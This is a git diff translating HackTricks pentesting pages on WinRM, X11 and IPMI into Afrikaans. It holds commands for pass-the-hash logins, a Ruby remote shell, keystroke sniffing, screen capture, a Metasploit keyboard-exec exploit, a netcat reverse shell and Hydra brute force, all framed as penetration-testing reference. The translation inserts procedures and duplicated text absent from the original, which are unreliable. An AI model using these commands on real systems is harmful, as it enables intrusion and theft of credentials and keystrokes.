[https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) ```ruby evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i / ``` +Om evil-winrm te gebruik om aan te sluit by 'n IPv6-adres, skep 'n inskrywing binne **/etc/hosts** wat 'n domeinnaam aan die IPv6-adres koppel en maak verbinding met daardie domein. -To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/etc/hosts**_ setting a **domain name** to the IPv6 address and connect to that domain. - -### Pass the hash with evil-winrm - +### Gee die has met evil-winrm deur ```ruby evil-winrm -u -H -i ``` - ![](<../.gitbook/assets/image (173).png>) -### Using a PS-docker machine +### Die gebruik van 'n PS-docker masjien +Om WinRM te pentest, kan jy 'n PS-docker masjien gebruik om 'n omgewing te skep waarin jy die tegniek kan toets. Hier is die stappe om dit te doen: + +1. Skep 'n nuwe PS-docker masjien deur die volgende opdrag uit te voer: + ```plaintext + docker run -it --name winrm-test -p 5985:5985 -p 5986:5986 mcr.microsoft.com/windows/servercore:ltsc2019 powershell + ``` + +2. Maak 'n nuwe PowerShell-sessie met die WinRM-module: + ```plaintext + $session = New-PSSession -ComputerName -Port -Credential + ``` + +3. Maak 'n nuwe sessie met die WinRM-module: + ```plaintext + Enter-PSSession -Session $session + ``` + +4. Jy is nou in 'n interaktiewe PowerShell-sessie op die doelwitbediener. Jy kan verskillende WinRM-opdragte uitvoer om die omgewing te toets en te pentest. + +5. As jy klaar is, kan jy die PS-docker masjien verwyder deur die volgende opdrag uit te voer: + ```plaintext + docker rm winrm-test -f + ``` + +Deur hierdie stappe te volg, kan jy 'n PS-docker masjien gebruik om WinRM te pentest en die veiligheid van die omgewing te evalueer. ``` docker run -it quickbreach/powershell-ntlm $creds = Get-Credential Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds ``` +### Gebruik 'n ruby-skrips -### Using a ruby script - -**Code extracted from here: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)** - +**Kode onttrek van hier: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm\_shell/)** ```ruby require 'winrm-fs' @@ -250,22 +269,22 @@ require 'winrm-fs' # https://alamot.github.io/winrm_shell/ -conn = WinRM::Connection.new( - endpoint: 'https://IP:PORT/wsman', - transport: :ssl, - user: 'username', - password: 'password', - :no_ssl_peer_verification => true +conn = WinRM::Connection.new( +endpoint: 'https://IP:PORT/wsman', +transport: :ssl, +user: 'username', +password: 'password', +:no_ssl_peer_verification => true ) class String - def tokenize - self. - split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). - select {|s| not s.empty? }. - map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} - end +def tokenize +self. +split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). +select {|s| not s.empty? }. +map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} +end end @@ -274,101 +293,96 @@ file_manager = WinRM::FS::FileManager.new(conn) conn.shell(:powershell) do |shell| - until command == "exit\n" do - output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") - print(output.output.chomp) - command = gets - if command.start_with?('UPLOAD') then - upload_command = command.tokenize - print("Uploading " + upload_command[1] + " to " + upload_command[2]) - file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path| - puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") - end - command = "echo `nOK`n" - end - output = shell.run(command) do |stdout, stderr| - STDOUT.print(stdout) - STDERR.print(stderr) - end - end - puts("Exiting with code #{output.exitcode}") +until command == "exit\n" do +output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')") +print(output.output.chomp) +command = gets +if command.start_with?('UPLOAD') then +upload_command = command.tokenize +print("Uploading " + upload_command[1] + " to " + upload_command[2]) +file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path| +puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") +end +command = "echo `nOK`n" +end +output = shell.run(command) do |stdout, stderr| +STDOUT.print(stdout) +STDERR.print(stderr) +end +end +puts("Exiting with code #{output.exitcode}") end ``` - ## Shodan * `port:5985 Microsoft-HTTPAPI` -## References +## Verwysings * [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: WinRM #Protocol Abbreviation if there is one. Port_Number: 5985 #Comma separated if there is more than one. Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for WinRM - Note: | - Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. +Name: Notes +Description: Notes for WinRM +Note: | +Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. - sudo gem install winrm winrm-fs colorize stringio - git clone https://github.com/Hackplayers/evil-winrm.git - cd evil-winrm - ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ +sudo gem install winrm winrm-fs colorize stringio +git clone https://github.com/Hackplayers/evil-winrm.git +cd evil-winrm +ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ - https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/ +https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/ - ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/ - ^^so you can upload binary's from that directory or -s to upload scripts (sherlock) - menu - invoke-binary `tab` +ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/ +^^so you can upload binary's from that directory or -s to upload scripts (sherlock) +menu +invoke-binary `tab` - #python3 - import winrm - s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret')) - print(s.run_cmd('ipconfig')) - print(s.run_ps('ipconfig')) +#python3 +import winrm +s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret')) +print(s.run_cmd('ipconfig')) +print(s.run_ps('ipconfig')) - https://book.hacktricks.xyz/pentesting/pentesting-winrm +https://book.hacktricks.xyz/pentesting/pentesting-winrm Entry_2: - Name: Hydra Brute Force - Description: Need User - Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} +Name: Hydra Brute Force +Description: Need User +Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} ``` - -​ -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 1407263ab..309e0b4bd 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -2,57 +2,52 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information +## Basiese Inligting -**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment. - -**Default port:** 6000 +**X Window System** (X) is 'n veelsydige venstersisteem wat algemeen voorkom op UNIX-gebaseerde bedryfstelsels. Dit bied 'n raamwerk vir die skep van grafiese **gebruikerskoppelvlakke (GUI's)**, met individuele programme wat die gebruikerskoppelvlakontwerp hanteer. Hierdie buigsaamheid maak diverse en aanpasbare ervarings binne die X-omgewing moontlik. +**Verstekpoort:** 6000 ``` PORT STATE SERVICE 6000/tcp open X11 ``` +## Opname -## Enumeration - -Check for **anonymous connection:** - +Kyk vir **anonieme verbinding:** ```bash nmap -sV --script x11-access -p msf> use auxiliary/scanner/x11/open_x11 ``` +#### Plaaslike Opsomming -#### Local Enumeration - -The file **`.Xauthority`** in the users home folder is **used** by **X11 for authorization**. From [**here**](https://stackoverflow.com/a/37367518): - +Die lêer **`.Xauthority`** in die gebruiker se tuisskyf word **gebruik** deur **X11 vir outorisasie**. Van [**hier**](https://stackoverflow.com/a/37367518): ```bash $ xxd ~/.Xauthority 00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M @@ -60,36 +55,41 @@ $ xxd ~/.Xauthority 00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X 00000030: 041d ef ... ``` - -> MIT-magic-cookie-1: Generating 128bit of key (“cookie”), storing it in \~/.Xauthority (or where XAUTHORITY envvar points to). The client sends it to server plain! the server checks whether it has a copy of this “cookie” and if so, the connection is permitted. the key is generated by DMX. +> MIT-towenaar-koekie-1: Genereer 128-bits sleutel ("koekie"), stoor dit in \~/.Xauthority (of waar die XAUTHORITY envvar na verwys). Die kliënt stuur dit plain na die bediener! Die bediener kontroleer of dit 'n kopie van hierdie "koekie" het en as dit wel die geval is, word die verbinding toegelaat. Die sleutel word gegenereer deur DMX. {% hint style="warning" %} -In order to **use the cookie** you should set the env var: **`export XAUTHORITY=/path/to/.Xauthority`** +Om die koekie te **gebruik**, moet jy die env-var stel: **`export XAUTHORITY=/pad/na/.Xauthority`** {% endhint %} -#### Local Enumeration Session - +#### Plaaslike Enumerasie-sessie ```bash -$ w - 23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 +$ w +23:50:48 up 1 day, 10:32, 1 user, load average: 0.29, 6.48, 7.12 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session ``` -In the example, `localhost:0` was running xfce4-session. +## Verifieer Verbinding -## Verfy Connection +To verify the X11 connection, you can use the `xeyes` command. This command opens a small window with a pair of eyes that follow the mouse cursor. +Om die X11-verbinding te verifieer, kan jy die `xeyes`-opdrag gebruik. Hierdie opdrag open 'n klein venster met 'n paar oë wat die muisaanwyser volg. + +```bash +$ xeyes +``` + +If the eyes appear on your screen, it means that the X11 connection is working properly. + +As die oë op jou skerm verskyn, beteken dit dat die X11-verbinding korrek werk. ```bash xdpyinfo -display : xwininfo -root -tree -display : #Ex: xwininfo -root -tree -display 10.5.5.12:0 ``` +## Sleutelloggin -## Keyloggin - -[xspy](http://tools.kali.org/sniffingspoofing/xspy) to sniff the keyboard keystrokes. - -Sample Output: +[xspy](http://tools.kali.org/sniffingspoofing/xspy) om die sleutelbordtoetse te snuif. +Voorbeelduitset: ``` xspy 10.9.xx.xx @@ -97,26 +97,54 @@ opened 10.9.xx.xx:0 for snoopng swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123 qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab ``` +## Skermskote vaslegging -## Screenshots capturing +Skermskote vaslegging is 'n tegniek wat gebruik word om visuele inligting van 'n X11-sessie vas te lê. Dit kan gebruik word tydens pentesting om toegang tot die skerm van 'n gebruiker te verkry en sensitiewe inligting te onderskep. +### X11-sessies + +X11 is 'n protokol wat gebruik word vir die vertoon van grafiese gebruikerskoppelvlakke op Unix-gebaseerde stelsels. Dit maak gebruik van 'n klient-bedienersmodel, waar die X-server die skerm vertoon en die X-kliënt programme gebruik om die vertooning te beheer. + +### Skermskote vasleggingstegnieke + +Daar is verskeie tegnieke wat gebruik kan word om skermskote vas te lê in 'n X11-sessie. Hier is 'n paar voorbeelde: + +1. **xwd**: Die xwd-opdrag kan gebruik word om 'n skermskoot van 'n X11-sessie te neem en dit na 'n lêer te stuur. Byvoorbeeld: + + ``` + xwd -root -out screenshot.xwd + ``` + +2. **xwdtopnm**: Die xwdtopnm-hulpprogramma kan gebruik word om 'n xwd-lêer na 'n draagbare gryskaartformaat (PNM) om te skakel. Byvoorbeeld: + + ``` + xwdtopnm screenshot.xwd > screenshot.pnm + ``` + +3. **convert**: Die convert-opdrag van die ImageMagick-pakket kan gebruik word om 'n skermskoot na 'n ander formaat, soos JPEG of PNG, om te skakel. Byvoorbeeld: + + ``` + convert screenshot.pnm screenshot.jpg + ``` + +### Gebruik van skermskote vaslegging in pentesting + +By die uitvoering van 'n pentest, kan skermskote vaslegging gebruik word om toegang tot die skerm van 'n gebruiker te verkry en potensiële kwesbaarhede te identifiseer. Dit kan ook gebruik word om inligting soos wagwoorde, persoonlike inligting en ander sensitiewe data te onderskep. + +Dit is belangrik om etiese hackingpraktyke te volg en slegs skermskote vas te lê met die toestemming van die eienaar van die stelsel. ```bash xwd -root -screen -silent -display > screenshot.xwd convert screenshot.xwd screenshot.png ``` +## Afstandskantoor Aansig -## Remote Desktop View - -Way from: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) - +Bron: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) ``` ./xrdp.py ``` +Weg van: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) -Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) - -First we need to find the ID of the window using xwininfo - +Eerst moet ons die ID van die venster vind deur xwininfo te gebruik. ``` xwininfo -root -display 10.9.xx.xx:0 @@ -143,42 +171,35 @@ Override Redirect State: no Corners: +0+0 -0+0 -0-0 +0-0 -geometry 1024x768+0+0 ``` - **XWatchwin** -For **live viewing** we need to use - +Vir **lewende siening** moet ons gebruik maak van ```bash ./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo ./xwatchwin 10.9.xx.xx:0 -w 0x45 ``` +## Kry Skulp -## Get Shell - +Om 'n skulp te kry ``` msf> use exploit/unix/x11/x11_keyboard_exec ``` +Ander manier: -Other way: - -**Reverse Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command: - +**Omgekeerde Skulp:** Xrdp maak dit ook moontlik om 'n omgekeerde skulp te gebruik deur middel van Netcat. Tik die volgende bevel in: ```bash ./xrdp.py \ –no-disp ``` +In die koppelvlak kan jy die **R-shell opsie** sien. -In the interface you can see the **R-shell option**. - -Then, start a **Netcat listener** in your local system on port 5555. - +Begin dan 'n **Netcat luisteraar** in jou plaaslike stelsel op poort 5555. ```bash nc -lvp 5555 ``` - -Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell +Plaas dan jou IP-adres en poort in die **R-Shell** opsie en klik op **R-shell** om 'n skulp te kry -## References +## Verwysings * [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) @@ -189,29 +210,29 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutvinders van beloningsjagte! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hacknuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutvindings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md index e7ef373fc..1efc7bed1 100644 --- a/network-services-pentesting/623-udp-ipmi.md +++ b/network-services-pentesting/623-udp-ipmi.md @@ -4,128 +4,109 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -### **Overview of IPMI** +### **Oorsig van IPMI** -**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for: +**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** bied 'n gestandaardiseerde benadering vir afstandsbestuur en monitering van rekenaarstelsels, onafhanklik van die bedryfstelsel of kragtoestand. Hierdie tegnologie maak dit moontlik vir stelseladministrateurs om stelsels op afstand te bestuur, selfs wanneer hulle afgeskakel of onreageerbaar is, en is veral nuttig vir: -- Pre-OS boot configurations -- Power-off management -- Recovery from system failures +- Voor-OS-opstartkonfigurasies +- Kragafskakelingbestuur +- Herstel van stelselstoringe -IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection. +IPMI is in staat om temperature, spanning, spoed van waaiers en kragvoorsiening te monitor, en bied ook inventarisinligting, hersiening van hardeware-logboeke en stuur waarskuwings via SNMP. 'n Kragbron en 'n LAN-verbinding is noodsaaklik vir sy werking. -Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include: +Sedert dit in 1998 deur Intel bekendgestel is, word IPMI ondersteun deur talle verskaffers wat afstandsbestuursmoontlikhede verbeter het, veral met ondersteuning vir seriële oor LAN in weergawe 2.0. Sleutelkomponente sluit in: -- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations. -- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections. -- **IPMI Memory:** For storing logs and data. +- **Baseboard Management Controller (BMC):** Die hoofmikrokontroleerder vir IPMI-operasies. +- **Kommunikasiebusse en -interfaces:** Vir interne en eksterne kommunikasie, insluitend ICMB, IPMB en verskeie interfaces vir plaaslike en netwerkverbindings. +- **IPMI-geheue:** Vir berging van logboeke en data. ![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) -**Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP) +**Verstekpoort**: 623/UDP/TCP (Dit is gewoonlik op UDP, maar dit kan ook op TCP loop) -## Enumeration - -### Discovery +## Enumerasie +### Ontdekking ```bash nmap -n -p 623 10.0.0./24 nmap -n-sU -p 623 10.0.0./24 use auxiliary/scanner/ipmi/ipmi_version ``` - -You can **identify** the **version** using: - +Jy kan die weergawe identifiseer deur die volgende te gebruik: ```bash use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 ``` +### IPMI Kwesbaarhede -### IPMI Vulnerabilities +In die domein van IPMI 2.0 is 'n beduidende sekuriteitsfout ontdek deur Dan Farmer, wat 'n kwesbaarheid deur middel van **sifer tipe 0** blootgestel het. Hierdie kwesbaarheid, in detail gedokumenteer by [Dan Farmer se navorsing](http://fish2.com/ipmi/cipherzero.html), maak ongemagtigde toegang moontlik met enige wagwoord, mits 'n geldige gebruiker geteiken word. Hierdie swakheid is gevind in verskeie BMC's van vervaardigers soos HP, Dell en Supermicro, wat dui op 'n wye verspreide probleem binne alle IPMI 2.0-implementasies. -In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through **cipher type 0**. This vulnerability, documented in detail at [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations. - -### **IPMI Authentication Bypass via Cipher 0** - -To detect this flaw, the following Metasploit auxiliary 